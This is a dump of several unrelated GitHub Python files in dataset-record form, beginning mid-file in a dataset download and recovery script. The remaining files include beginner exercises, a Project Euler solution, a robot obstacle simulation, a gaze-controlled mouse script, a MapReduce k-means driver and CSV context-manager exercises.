dataset_folder = f\"data/processed-data/{dataset_split_type}\"\n dataset_csv = pd.read_csv(f\"{dataset_folder}/{dataset_type}.csv\")\n dataset_len = len(dataset_csv)\n # scan for remaining segments to download\n folder_children = os.scandir(dataset_folder)\n relevant_files = [] # will store the files that are of that category\n\n for child in folder_children:\n if re.search(f\"{dataset_type}-\\d+-img\\.npy\", child.name):\n relevant_files.append(child.name)\n \n floored_upper = int(dataset_len / 500) * 500 # get all the expected segment numbers\n upper = 0\n if floored_upper < dataset_len:\n upper = floored_upper + 500\n else:\n upper = floored_upper\n \n remaining_bounds = [] # stash the remaining bound after searching through\n\n i = 0 # monitor bounds\n while i + 500 <= upper:\n i += 500\n segment_file = f\"{dataset_type}-{i - 1}-img.npy\"\n try:\n relevant_files.index(segment_file)\n except:\n remaining_bounds.append(i - 1)\n \n thread_pool = []\n \n with cf.ThreadPoolExecutor() as recovery_executor:\n for bound in remaining_bounds:\n if bound + 1 <= dataset_len:\n populate_future = recovery_executor.submit(\n populate_segments,\n bound,\n dataset_split_type,\n dataset_type,\n dataset_csv.iloc[bound - 499: (bound + 1)], # segment data by boundng hundreds\n )\n thread_pool.append(populate_future)\n else:\n populate_future = recovery_executor.submit(\n populate_segments,\n bound,\n dataset_split_type,\n dataset_type,\n dataset_csv.iloc[bound - 499: dataset_len], # segment data by boundng hundreds\n )\n thread_pool.append(populate_future)\n\n for future_populate_segment in cf.as_completed(thread_pool):\n try:\n result = future_populate_segment.result()\n print(result)\n except Exception as exc:\n print(future_populate_segment.exception())\n \n\n\ndef is_salvagable(dataset_split_type, dataset_type):\n \"\"\" Checks for salvagability of folder before forcing fresh download\n\n This includes looking for already downloaded segment files in the respetive folder\n This looks for folders with the segment file structure e.g.\n For training data, the segment would be `train-99-img.npy`\n \n Args:\n dataset_split_type: \"50-50\" | \"70-30\" | \"80-20\" | \"909-10\"\n dataset_type: whether it is `\"train\"` or `\"test\"` data\n \n Returns:\n bool: representing whether or not a segmented dataset was found\n \"\"\"\n downloaded_segment_found = False\n dataset_folder = f\"data/processed-data/{dataset_split_type}\"\n\n # scan for remaining any previously downloaded segments\n folder_children = os.scandir(dataset_folder)\n\n # looking for the first file that fits the criteria. if any file is found that fits\n # the below regular expression, we break out of the loop and attempt recovery\n for child in folder_children:\n if re.search(f\"{dataset_type}-\\d+-img\\.npy\", child.name):\n downloaded_segment_found = True\n break\n \n return downloaded_segment_found\n\n\ndef is_complete(dataset_split_type, dataset_type):\n \"\"\" Checks whether the files have already been downloaded and assembled\n \"\"\"\n complete = False # flag returned after scanning directory\n target_folder = f\"data/processed-data/{dataset_split_type}\"\n # scan for folder children\n folder_children = [child.name for child in os.scandir(target_folder)]\n try:\n folder_children.index(f\"{dataset_type}-img.npy\")\n complete = True # getting to this point means that the ndex was found\n except: # value not found\n pass\n \n return complete\n\n\nif __name__ == \"__main__\":\n datasets = [\"50-50\", \"70-30\", \"80-20\", \"90-10\"]\n\n for dataset_split_type in datasets:\n train_csv = pd.read_csv(f\"data/processed-data/{dataset_split_type}/train.csv\")\n test_csv = pd.read_csv(f\"data/processed-data/{dataset_split_type}/test.csv\")\n\n # check for salvagability before committing to a fresh download for both train and test\n train_assembled = is_complete(dataset_split_type, \"train\")\n test_assembled = is_complete(dataset_split_type, \"test\")\n\n if train_assembled:\n print(f\"{dataset_split_type} train dataset already downloaded\")\n elif is_salvagable(dataset_split_type, \"train\"):\n print(f\"Attempting Recovery for training data in {dataset_split_type}...\")\n attempt_recovery(dataset_split_type, \"train\")\n print(f\"Train Dataset with split: {dataset_split_type} download complete\")\n else:\n download_images(dataset_split_type, train_csv, \"train\")\n print(f\"Train Dataset with split: {dataset_split_type} download complete\")\n\n if test_assembled:\n print(f\"{dataset_split_type} test dataset already downloaded\")\n elif is_salvagable(dataset_split_type, \"test\"):\n print(f\"Attempting Recovery for training data in {dataset_split_type}...\")\n attempt_recovery(dataset_split_type, \"test\")\n print(f\"Test Dataset with split: {dataset_split_type} download complete\")\n else:\n download_images(dataset_split_type, test_csv, \"test\")\n print(f\"Test Dataset with split: {dataset_split_type} download complete\")\n\n assemble_dataset(dataset_split_type, len(train_csv), len(test_csv), train_assembled, test_assembled)\n","repo_name":"sloppie/media-wellbeing","sub_path":"pre-processing/save_images.py","file_name":"save_images.py","file_ext":"py","file_size_in_byte":15316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16564805927","text":"\"\"\" Units of Time\r\n Create a program that reads duration from the user as a number of days, hours, minutes, and seconds.\r\n Compute and display the total number of seconds represented by this duration.\"\"\"\r\n\r\nsecpermin=60\r\nsecperhour=3600\r\nsecperday=86400\r\ndays=int(input(\"Enter the number of Days: \"))\r\nhours=int(input(\"Enter the number of Hours: \"))\r\nminutes=int(input(\"Enter the number of Minutes: \"))\r\nseconds=int(input(\"Enter the number of Seconds: \"))\r\ntotalseconds=days*secperday+(hours*secperhour)+(minutes*secpermin)+seconds\r\nprint(\"Total number of seconds = \",\"%d\"%(totalseconds))","repo_name":"LOKESH538/Python","sub_path":"Assignment-2/InSeconds.py","file_name":"InSeconds.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18717238836","text":"titulo = \"Proporciona los siguientes datos del libro:\"\nnombre = input(\"Introduzca nombre del libro: \")\nid = int(input(\"Introduzca ID del libro: \"))\nprecio = float(input(\"Introduzca precio del libro: \"))\nenvio = input(\"Indica si el envio es gratiuito (True/False)\")\n\nif envio == 'True':\n envio = True\nelif envio == 'False':\n envio = False\nelse:\n envio = \"Valor incorrecto debe introducir True/False\"\n\n# print(f\"Nombre: {nombre}\\nID: {id}\\nPrecio: {precio}\\nEnvio Gratuito?: {envio}\")\n# F String puedes poner texto preformateado\nprint(f'''\nNombre: {nombre}\nID: {id}\nPrecio: {precio}\nEnvio Gratuito?: {envio}\n''')\n\n","repo_name":"TheHardest18/python_exercises","sub_path":"Leccion02/EjerTiendaLibros.py","file_name":"EjerTiendaLibros.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1798572616","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\n\r\n\r\n\r\ndef drawBat(cX, cY, cXdash , cYdash ):\r\n plt.plot([cX,cXdash],[cY,cYdash])\r\n plt.show()\r\n\r\ndef calcVector(Current):\r\n vecCurrent = np.array([(Current[0, 0] - Current[1, 0]), (Current[0, 1] - Current[1, 1])])\r\n return vecCurrent\r\n\r\ndef calcVector(Topoint , Frompoint):\r\n Vector = np.array([(Topoint[0] - Frompoint[0]), (Topoint[1] - Frompoint[1])])\r\n return Vector\r\n\r\ndef calcAngle(m1 , m2):\r\n tanOfang = abs(((m2-m1)/(1+(m2*m1))))\r\n ang = math.degrees(math.atan(tanOfang))\r\n return ang\r\n\r\n\r\n\r\ndef calcShortestPoint( Robot , Obstacle):\r\n if ((Obstacle[0,1]-Obstacle[1,1]) != 0 and (Obstacle[0,0]-Obstacle[1,0]) != 0):\r\n\r\n m = ((Obstacle[0,1]-Obstacle[1,1])/(Obstacle[0,0]-Obstacle[1,0]))\r\n\r\n c1 = (-m*Obstacle[1,0]) + Obstacle[1,1]\r\n c2 = (1/m)*Robot[0] + Robot[1]\r\n\r\n\r\n ShPointX = ((c2- c1)*m)/(pow(m,2)+1)\r\n\r\n ShPointY = (((c1- c2))/(pow(m,2)+1)) + c2\r\n else:\r\n if((Obstacle[0,0]-Obstacle[1,0]) == 0):\r\n ShPointX = Obstacle[0,0]\r\n ShPointY = Robot[1]\r\n\r\n if ((Obstacle[0,1]-Obstacle[1,1])== 0):\r\n ShPointX = Robot[0]\r\n ShPointY = Obstacle[0,1]\r\n\r\n print(\"sh\",ShPointX,ShPointY)\r\n\r\n vectorObstacle=[Obstacle[0,0]-Obstacle[1,0] , Obstacle[0,1]-Obstacle[1,1]]\r\n vectorSh = [ShPointX-Obstacle[1,0] , ShPointY -Obstacle[1,1]]\r\n dotvecObs = np.dot(vectorObstacle,vectorObstacle)\r\n dotvecSh = np.dot(vectorObstacle,vectorSh)\r\n if (dotvecObs <= dotvecSh):\r\n shortestPt =[Obstacle[0,0],Obstacle[0,1]]\r\n else:\r\n if (dotvecSh <= 0):\r\n shortestPt = [Obstacle[1,0] , Obstacle[1,1]]\r\n else:\r\n shortestPt = [ShPointX , ShPointY]\r\n\r\n return shortestPt\r\n\r\nRobot = np.array([3,3])\r\nObs = np.array([[-40,1],[-40,200]])\r\nprint(calcShortestPoint(Robot,Obs)) # for checking\r\n\r\ndef rotateRobot(CurrentPath , theta):\r\n #Rotation of the robot about center\r\n Center=[CurrentPath[:,0].mean(),CurrentPath[:,1].mean()]\r\n #translation\r\n transCurrentfront = CurrentPath[0,:] - Center\r\n transCurrentback = CurrentPath[1, :] - Center\r\n #rotation\r\n theta = math.radians(theta)\r\n Rotmat = np.array([[math.cos(theta),- math.sin(theta)],[math.sin(theta),math.cos(theta)]])\r\n RotCurrentfront = np.matmul(Rotmat, transCurrentfront)\r\n RotCurrentback = np.matmul(Rotmat,transCurrentback)\r\n Advfront = RotCurrentfront + Center\r\n Advback = RotCurrentback + Center\r\n Rotpos = np.array([Advfront, Advback])\r\n return Rotpos\r\n\r\n\r\n\r\ndef pointAtDistance(dist , Current ):\r\n\r\n vecCurrent = [(Current[0, 0] - Current[1, 0]), (Current[0, 1] - Current[1, 1])]\r\n magCurrent = math.sqrt(math.pow(vecCurrent[0],2)+ math.pow(vecCurrent[1],2))\r\n unitvecCurrent = np.divide(vecCurrent,magCurrent)\r\n\r\n\r\n if ((Current[0, 0] - Current[1, 0]) != 0):\r\n m = ((Current[0, 1] - Current[1, 1]) / (Current[0, 0] - Current[1, 0]))\r\n x3 = math.sqrt((pow(dist,2))/(pow(m,2)+1)) + Current[1, 0]\r\n x32 = - math.sqrt((pow(dist,2))/(pow(m,2)+1)) + Current[1, 0]\r\n y3 = m*(x3 - Current[1, 0])+ Current[1, 1]\r\n y32 = m * (x32 - Current[1, 0]) + Current[1, 1]\r\n\r\n x3dash = math.sqrt((pow(dist, 2)) / (pow(m, 2) + 1)) + Current[0, 0]\r\n x32dash = - math.sqrt((pow(dist, 2)) / (pow(m, 2) + 1)) + Current[0, 0]\r\n y3dash = m * (x3dash - Current[1, 0]) + Current[1, 1]\r\n y32dash = m * (x32dash - Current[1, 0]) + Current[1, 1]\r\n\r\n else:\r\n x3 = Current[1, 0]\r\n y3 = Current[1, 1] + dist\r\n x3dash = Current[0,0]\r\n y3dash = Current[0,1] + dist\r\n\r\n x32 = Current[1, 0]\r\n y32 = Current[1, 1] - dist\r\n x32dash = Current[0, 0]\r\n y32dash = Current[0, 1] - dist\r\n\r\n vecfront = [(x3 - Current[1, 0]), (y3- Current[1, 1])]\r\n magfront = math.sqrt(math.pow(vecfront[0], 2) + math.pow(vecfront[1], 2))\r\n unitvecfront = np.divide(vecfront, magfront)\r\n vecfront2 = [(x32 - Current[1, 0]), (y32 - Current[1, 1])]\r\n magfront2 = math.sqrt(math.pow(vecfront2[0], 2) + math.pow(vecfront2[1], 2))\r\n unitvecfront2 = np.divide(vecfront2, magfront2)\r\n #print(\" unit vec cur\", unitvecCurrent , \" unit vec fr\" , unitvecfront, \" \", unitvecfront2)\r\n #print(\" all check \" , unitvecfront2 == unitvecCurrent , \" check \" , np.equal(unitvecfront2,unitvecCurrent) , \" diff \" , np.all(abs(unitvecfront2 - unitvecCurrent ) < 0.00001) )\r\n if(np.all(abs(unitvecfront - unitvecCurrent ) < 0.00001)):\r\n print(\"1\")\r\n Futpos = np.array([[x3dash,y3dash],[x3,y3]])\r\n\r\n if(np.all(abs(unitvecfront2 - unitvecCurrent ) < 0.00001)):\r\n print(\"2\")\r\n Futpos = np.array([[x32dash, y32dash], [x32, y32]])\r\n\r\n return Futpos\r\n\r\n# Robot = np.array([10,10])\r\n# Obs = np.array([[0,2],[5,7]])\r\n# dist = 10\r\n# print(pointAtDistance(dist,Obs))\r\n\r\ndef generateEcho(rdist,gbat,angle):\r\n af = 1\r\n Csei =0\r\n si =0\r\n Dsei = 0\r\n gi = gbat + 40*math.log((0.1/rdist),10) + 2*(rdist-0.1)*af + Dsei + si + Csei\r\n return gi\r\n\r\ndef defineVelocity(rdist):\r\n\r\n if (0.3 < rdist < 6):\r\n Velocity = rdist\r\n else:\r\n if(rdist >= 6 ):\r\n Velocity = 6\r\n else:\r\n Velocity = 0.3\r\n\r\n Angvelo = (6-Velocity)*100\r\n\r\n return Velocity,Angvelo\r\n\r\ndef calcDistance(point1 , point2):\r\n dist = math.sqrt((math.pow((point1[0]-point2[0]),2)+math.pow((point1[1]-point2[1]),2)))\r\n return dist\r\n\r\ndef controllerRobot(Robot,Obstacle):\r\n RobotLeft = Robot[0]\r\n RobotRight = Robot[1]\r\n RobotCenter = (Robot[0]+Robot[1])/2\r\n Rleft = calcShortestPoint(RobotLeft[0],Obstacle)\r\n print(\"points\", Rleft , \" \", RobotLeft[0])\r\n RLdist = calcDistance(Rleft,RobotLeft[0])\r\n Rright = calcShortestPoint(RobotRight[0], Obstacle)\r\n RRdist = calcDistance(Rright, RobotRight[0])\r\n Rcen = calcShortestPoint(RobotCenter[0],Obstacle)\r\n Rdist = calcDistance(Rcen, RobotCenter[0])\r\n if((RobotCenter[0,0]-RobotCenter[0,1])==0):\r\n SlopeRobot = math.inf\r\n else:\r\n SlopeRobot = (RobotCenter[0,1] - RobotCenter[1,1])/(RobotCenter[0,0]-RobotCenter[0,1])\r\n if ((Obstacle[0,0]-Obstacle[0,1]) == 0):\r\n SlopeObstacle= math.inf\r\n else:\r\n SlopeObstacle = (Obstacle[0,1] - Obstacle[1,1])/(Obstacle[0,0]-Obstacle[0,1])\r\n\r\n sei = calcAngle(SlopeRobot,SlopeObstacle)\r\n print(\" angle\", sei)\r\n gl = generateEcho(RLdist,120,sei)\r\n gr = generateEcho(RRdist,120,sei)\r\n print( \"echo \", gl ,gr )\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n RobotLeft = np.array([[1,1],[10,10]])\r\n RobotRight = np.array([[1,-1],[10,8]])\r\n Robot = np.array([RobotLeft , RobotRight])\r\n Obstacle_Hor = np.array([[-40,0],[-40,200]])\r\n controllerRobot(Robot,Obstacle_Hor)\r\n plt.plot(Obstacle_Hor[:,0],Obstacle_Hor[:,1])\r\n plt.plot(RobotLeft[:,0],RobotLeft[:,1])\r\n plt.plot(RobotRight[:, 0], RobotRight[:, 1])\r\n plt.show()\r\n","repo_name":"AdithyaVenkateshMohan/Bio-inspired-Bats-Autonomous-Car-algorithm-simulation","sub_path":"version1.2.py","file_name":"version1.2.py","file_ext":"py","file_size_in_byte":6960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"8270414111","text":"total_num_actions=3\nimagecount=0\nlook_around_X_data=[]\nlook_around_Y_data = []\nvalue_for_y=0.\nn_steps=32\ndata_path='./SyntheticDataV1'\nlabel_track_dict={}\nglobal mainx,mainy\nmainx=[]\nmainy=[]\n\n \n\nfor folders in os.listdir(data_path):\n\t\tfor actions,sub_folders in enumerate(os.listdir(data_path+'/'+folders)):\n\t\t\tfor real_actions in os.listdir(data_path+'/'+folders+'/'+sub_folders):\n\t\t\t\tframe_provider = VideoReader(data_path+'/'+folders+'/'+sub_folders+'/'+real_actions)\n\t\t\t\trun_demo(net, frame_provider, 256, cpu, 1, 1,actions-1)\n\t\t\n\n\ndef duplicate_creation(look_around_X_data,n_steps):\n\t\tmod_val=len(look_around_X_data) % n_steps\n\t\tduplicate_count=abs(int((((len(look_around_X_data)-mod_val)/ n_steps)+ 1)*n_steps-len(look_around_X_data)))\n\t\ttobeadded_X=look_around_X_data[len(look_around_X_data)-1]\n\t\ttobeadded_Y=look_around_Y_data[len(look_around_Y_data)-1]\n\t\tprint(\"Adding last record Duplicates. Total number is: \",duplicate_count)\n\t\tfor nums in range(0,duplicate_count):\n\t\t\tlook_around_X_data.append(tobeadded_X)\n\t\t\tlook_around_Y_data.append(tobeadded_Y)\n\n\n\t\n\ndef data_for_model(look_around_X_data,n_steps,look_around_Y_data):\n\n\tdef most_frequent(List): \n\t\tcounter = 0\n\t\tnum = List[0] \n\t\tfor i in List: \n\t\t\tcurr_frequency = List.count(i) \n\t\t\tif(curr_frequency> counter): \n\t\t\t\tcounter = curr_frequency \n\t\t\t\tnum = i \n\t\treturn num \n\twith open('Xdata.txt', 'w') as outfile:\n\t\tjson.dump(look_around_X_data, outfile)\n\n\tX_ = np.array(look_around_X_data)\n\tblocks = int(len(X_) / n_steps)\n\n\tX_ = np.array(np.split(X_,blocks))\n\t\n\tDivided_Y=[]\n\tj=[]\n # for elements in look_around_Y_data:\n # if(elements[0]==0.0):\n # j.append([1,0,0])\n # elif(elements[0]==1.0):\n # j.append([0,1,0])\n # elif(elements[0]==2.0):\n\t\t\t#j.append([0,0,1])\n\t\t\n\t \n\tfor elements in look_around_Y_data:\n\t\tif(elements[0]==0.0):\n\t\t\tj.append([1,0])\n\t\telif(elements[0]==1.0):\n\t\t\tj.append([0,1])\n\t # elif(elements[0]==2.0):\n\t# j.append([0,0,1])\n\t # elif(elements[0]==3.0):\n\t # j.append([0,0,0,1,0])\n\t # elif(elements[0]==4.0):\n\t # j.append([0,0,0,0,1])\n\tfor i in range(0,len(j),n_steps):\n\t\tDivided_Y.append(j[i:i+n_steps])\n\tfinal_y=[]\n\tfor i in range(0,len(Divided_Y)):\n\t\tfinal_y.append(most_frequent(Divided_Y[i]))\n\twith open('Ydata.txt', 'w') as outfile:\n\t\tjson.dump(j, outfile)\n\ty_= np.array(final_y)\n\n\treturn X_,y_\n\n\n\n\n\nif(len(look_around_X_data)%n_steps!=0):\n\tduplicate_creation(look_around_X_data,n_steps)\n\n\n\n\nnpX_,npy_=data_for_model(look_around_X_data,n_steps,look_around_Y_data)\n\nprint(\"Shapes: npx: \",npX_.shape,\" npy: \",npy_.shape,\"\\n\\n\\nnpy: \",npy_)\nf = Figlet(font='slant') \nprint (f.renderText(\"MODEL STARTS FROM HERE\"))\nprint(\"\\n\\nYtest: \",npy_,'\\n\\n')\n\n\n\n\nX_train, X_test, y_train, y_test = train_test_split(npX_, npy_, test_size=0.4, random_state=5)\n\nprint(\"(X_train shape, y_train shape, X_test shape ,y_test shape)\")\nprint(X_train.shape, y_train.shape, X_test.shape, y_test.shape)","repo_name":"adityacbhat/PatientMonitoringSystem","sub_path":"dataCreation.py","file_name":"dataCreation.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12899417221","text":"import cv2\nimport numpy as np\nfrom gaze_tracking import GazeTracking\nfrom utils import MouseAction, ReadWebcam, ReadVideo, annotate\n\n\nclass EyeControl:\n \"\"\"\n Control the mouse with eyes\n \"\"\"\n def __init__(self, source: str = \"\") -> None:\n self.gaze = GazeTracking()\n self.mouse = MouseAction()\n self.streams = ReadVideo(source) if source != \"0\" else ReadWebcam()\n\n def start(self):\n for frame, fshape in self.streams:\n frame, LP, RP, text = self.gaze_meta(frame)\n x, y = self.mouse.eye_position(LP, RP)\n self.mouse.mouse_action(fshape[:2], [x, y])\n\n frame = annotate(frame, text, LP, RP)\n cv2.imshow(\"Demo\", frame)\n if cv2.waitKey(1) == 27:\n cv2.destroyAllWindows()\n break\n\n def gaze_meta(self, frame: np.array):\n gaze = self.gaze\n gaze.refresh(frame)\n frame = gaze.annotated_frame()\n LP = gaze.pupil_left_coords()\n RP = gaze.pupil_right_coords()\n text = \"\"\n if gaze.is_blinking():\n text = \"Blinking\"\n elif gaze.is_right():\n text = \"Looking right\"\n elif gaze.is_left():\n text = \"Looking left\"\n elif gaze.is_center():\n text = \"Looking center\"\n return frame, LP, RP, text\n\n\nif __name__ == \"__main__\":\n source = \"videoplayback.mp4\"\n ec = EyeControl(source)\n ec.start()\n","repo_name":"1chimaruGin/EyeControl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"22015913389","text":"#Problem85\n\n\"\"\"\nIn looking at a grid of length = n and width = 1, we see that the potential\nfor any sized rectangle (x,y) is 1<=x<=n is n-x rectangles. Thus, if we look\nat a 5x1 grid, there are\n - 5 possible 1x1 rectangles\n - 4 possible 2x1 rectangles\n - 3 possible 3x1 rectangles => 5+4+3+2+1 = 5*(5+1)/2\n - 2 possible 4x1 rectangles = 5th triangular number\n - 1 possible 5x1 rectangle\n\nIf we look at a grid of legnth = n and width = m != 1, we can see by the same\nprinciple that if there are n*(n+1)/2 possible rectangles in each row,\nthen there are\n - m * n*(n+1)/2 rectangles (width = 1)\n - (m-1) * n*(n+1)/2 rectangles (width = 2)\n - (m-2) * n*(n+1)/2 rectangles (width = 3)\n - . . . \n - 2 * n*(n+1)/2 rectangles (width = m-1)\n - 1 * n*(n+1)/2 rectangles (width = m)\n\n=> (m + m-1 + m-2 + ... + 2 + 1) * n*(n+1)/2 = (m*(m+1)/2)*(n*(n+1)/2)\n=> = (m*(m+1)*n*(n+1)/4)\n\"\"\"\nimport time\n\ndef space_determination(length, l):\n return length+1-l\n\ndef rectangle_counter(length, width):\n \"\"\"This function goes the long way, where it adds n+n-1+...+1 and multiplies\n this value by m+m-1+..+1\"\"\"\n count = 0\n l, w = 1, 1\n for i in range(w, width+1):\n for j in range(l, length+1):\n count += space_determination(length, j) * space_determination(width, i)\n return count\n\ndef rectangle_counter_triangular(length, width):\n \"\"\"Uses the triangular number principle shown above instead of computing\n the potential rectangles for each sized row\"\"\"\n return (length*(length+1)*width*(width+1))/4\n\ndef main():\n #Determine which grid is the closest to 2 million\n\n start = time.clock()\n difference = 2000000\n location = [1, 1]\n for i in range(1, 100):\n for j in range(1, 100):\n if abs(2000000 - rectangle_counter_triangular(i, j)) < difference:\n difference = abs(2000000 - rectangle_counter(i, j))\n location = [i, j]\n #print(difference, i, j, sep = '\\t')\n t = time.clock() - start\n\n print(\"Final value:\", difference, \"at\", location)\n print(location[0]*location[1])\n print(t, \"seconds\")\n \n\n\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"KevinGoldberg/ProjectEulerScripts","sub_path":"Problem85.py","file_name":"Problem85.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70907813893","text":"# 프로그래머스 카펫\n# https://programmers.co.kr/learn/courses/30/lessons/42842\n\n\ndef solution(brown, red):\n for i in range(1, red+1):\n total = brown + red\n m, r = divmod(red, i)\n if r != 0:\n continue\n\n m = m+2\n i = i+2\n if m * i == total:\n return [m, i]\n","repo_name":"devjinius/algorithm","sub_path":"Programmers/carpet.py","file_name":"carpet.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"24699201834","text":"#!/usr/bin/env python3\n\"\"\"\n.. module:: MRKmeans\n\nMRKmeans\n*************\n\n:Description: MRKmeans\n\n Iterates the MRKmeansStep script\n\n:Authors: bejar\n\n\n:Version:\n\n:Created on: 17/07/2017 10:16\n\n\"\"\"\n\nimport argparse\nimport pathlib\nimport shutil\nimport time\nfrom multiprocessing import cpu_count\nfrom typing import Dict, List\n\nfrom MRKmeansStep import Assignment, Key, MRKmeansStep, Prototype\n\n__author__ = \"bejar\"\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--prot\", default=\"prototypes.txt\", help=\"Initial prototpes file\"\n )\n parser.add_argument(\"--output\", default=\".\", help=\"Output directory\")\n parser.add_argument(\"--docs\", default=\"documents.txt\", help=\"Documents data\")\n parser.add_argument(\"--iter\", default=5, type=int, help=\"Number of iterations\")\n parser.add_argument(\n \"-n\",\n \"--ncores\",\n \"--nproc\",\n default=min(1, cpu_count() - 2),\n type=int,\n help=\"Number of parallel processes to use\",\n )\n\n args = parser.parse_args()\n assign: Dict[Key, Assignment] = {}\n\n assign_values: List[Assignment] = []\n\n # Copies the initial prototypes\n outdir = pathlib.Path(args.output)\n outdir.mkdir(parents=True, exist_ok=True)\n\n shutil.copy(args.prot, outdir.joinpath(\"prototypes0.txt\"))\n\n moved = False # Stores if there has been changes in the current iteration\n for i in range(args.iter):\n tinit = time.time() # For timing the iterations\n\n # Configures the script\n print(\"Iteration %d ...\" % (i + 1))\n # The --file flag tells to MRjob to copy the file to HADOOP\n # The --prot flag tells to MRKmeansStep where to load the prototypes from\n mr_job1 = MRKmeansStep(\n args=[\n \"-r\",\n \"local\",\n args.docs,\n \"--file\",\n str(outdir.joinpath(\"prototypes%d.txt\" % i)),\n \"--prot\",\n str(outdir.joinpath(\"prototypes%d.txt\" % i)),\n \"--num-cores\",\n str(args.ncores),\n ]\n )\n\n # Runs the script\n with mr_job1.make_runner() as runner1:\n runner1.run()\n\n new_assign: Dict[Key, Assignment] = {}\n new_proto: Dict[Key, Prototype] = {}\n # Process the results of the script iterating the (key,value) pairs\n for key, value in mr_job1.parse_output(runner1.cat_output()):\n new_assign[key], new_proto[key] = value\n\n # Check if there has been changes in the assignment\n #\n # We cannot use the following, because the names of the\n # clusters may have swapped:\n # moved = new_assign != assign\n #\n # Instead, we check the ordered assignments of the\n # clusters:\n new_assign_values = sorted(new_assign.values())\n moved = assign_values != new_assign_values\n\n assign = new_assign\n assign_values = new_assign_values\n\n # Saves the new prototypes\n with open(outdir.joinpath(\"prototypes%d.txt\" % (i + 1)), \"w\") as f:\n for key in new_proto:\n f.write(\n key\n + \":\"\n + \" \".join(map(lambda x: f\"{x[0]}+{x[1]}\", new_proto[key]))\n + \"\\n\"\n )\n\n # Saves the new assignments\n with open(outdir.joinpath(\"assignments%d.txt\" % (i + 1)), \"w\") as f:\n for key, value in new_assign.items():\n f.write(key + \":\" + \" \".join(value) + \"\\n\")\n\n # If there is no changes in two consecutive iteration we can stop\n if not moved:\n print(\"Algorithm converged\")\n break\n\n print(f\"Time= {(time.time() - tinit)} seconds\")\n","repo_name":"Leixb/IRRS-labs","sub_path":"lab4/MRKmeans.py","file_name":"MRKmeans.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35364758624","text":"# project 5\nfrom collections import namedtuple\nfrom contextlib import contextmanager\nfrom itertools import islice\nimport csv\n\n#goal 1\nclass ctx_manager:\n def __init__(self, fname):\n self._fname = fname # storage of file name\n self._f = None # file object\n\n ### Iterator protocol\n def __iter__(self):\n return self\n\n def __next__(self):\n row = next(self._f) # eager eval!!!\n row = row.strip(self.dialect.lineterminator).split(self.dialect.delimiter)\n return self.Data(*row)\n ###\n\n ### Context manager protocol\n def __enter__(self): # opening file and doing additional utilities for iteration and processing data\n self._f = open(self._fname, 'r')\n sample = self._f.read(1000)\n self.dialect = csv.Sniffer().sniff(sample) # detecting dialect\n self._f.seek(0)\n self.header = next(self._f).strip(self.dialect.lineterminator).split(self.dialect.delimiter) # figuring out header in entring\n self.Data = namedtuple('Data', self.header) # preparing namedtuple\n return self\n\n def __exit__(self, exc_type, exc_value, exc_trace):\n if not self._f.closed:\n self._f.close()\n else:\n raise StopIteration\n return False\n ###\n'''\nwith ctx_manager('cars.csv') as d:\n for i in d:\n print(i)\n'''\n\n#goal 1 refactor after solution\nclass ctx_manager_ref:\n def __init__(self, fname):\n self._fname = fname # storage of file name\n self._f = None # file object\n\n ### Iterator protocol\n def __iter__(self):\n return self\n\n def __next__(self): \n return self.Data(*next(self._reader))\n ###\n\n ### Context manager protocol\n def __enter__(self): # opening file and doing additional utilities for iteration and processing data\n self._f = open(self._fname, 'r')\n sample = self._f.read(1000)\n self.dialect = csv.Sniffer().sniff(sample) # detecting dialect\n self._f.seek(0)\n self._reader = csv.reader(self._f, self.dialect)\n self.header = next(self._reader) # figuring out header\n self.Data = namedtuple('Data', self.header) # preparing namedtuple\n return self\n\n def __exit__(self, exc_type, exc_value, exc_trace):\n if not self._f.closed:\n self._f.close()\n else:\n raise StopIteration\n return False\n ###\n\nwith ctx_manager_ref('cars.csv') as d:\n for i in islice(d, 5):\n print(i)\n\n\n#goal 2\ndef detect_dialect(f):\n sample = f.read(1000)\n dialect = csv.Sniffer().sniff(sample)\n f.seek(0)\n return dialect\n\n@contextmanager\ndef opener(fname, mode='r'):\n f = open(fname, mode)\n try: \n yield f\n finally:\n f.close()\n\ndef yielder_gen():\n with opener('personal_info.csv', 'r') as d:\n dialect = detect_dialect(d)\n Data = namedtuple('Data', next(d).strip(dialect.lineterminator).split(dialect.delimiter))\n for record in d:\n yield Data(*record.strip(dialect.lineterminator).split(dialect.delimiter))\n\n'''\nproduct = yielder_gen()\n\nfor i in range(10):\n print(next(product))\n'''\n\n\n#goal 2 - refactor after solution\ndef detect_dialect_ref(f):\n sample = f.read(1000)\n dialect = csv.Sniffer().sniff(sample)\n f.seek(0)\n return dialect\n\n@contextmanager\ndef opener_ref(fname, mode='r'):\n f = open(fname, mode)\n try: \n ltr = detect_dialect_ref(f).lineterminator # everything should be inside try block to check every operation on file passed #unused csv.reader again - good/bad?\n dlm = detect_dialect_ref(f).delimiter\n Data = namedtuple('Data', next(f).strip(ltr).split(dlm))\n yield (Data(*record.strip(ltr).split(dlm)) for record in f) \n finally:\n f.close()\n\n'''\nwith opener_ref('cars.csv', 'r') as d:\n for i in islice(d, 5):\n print(i)\n 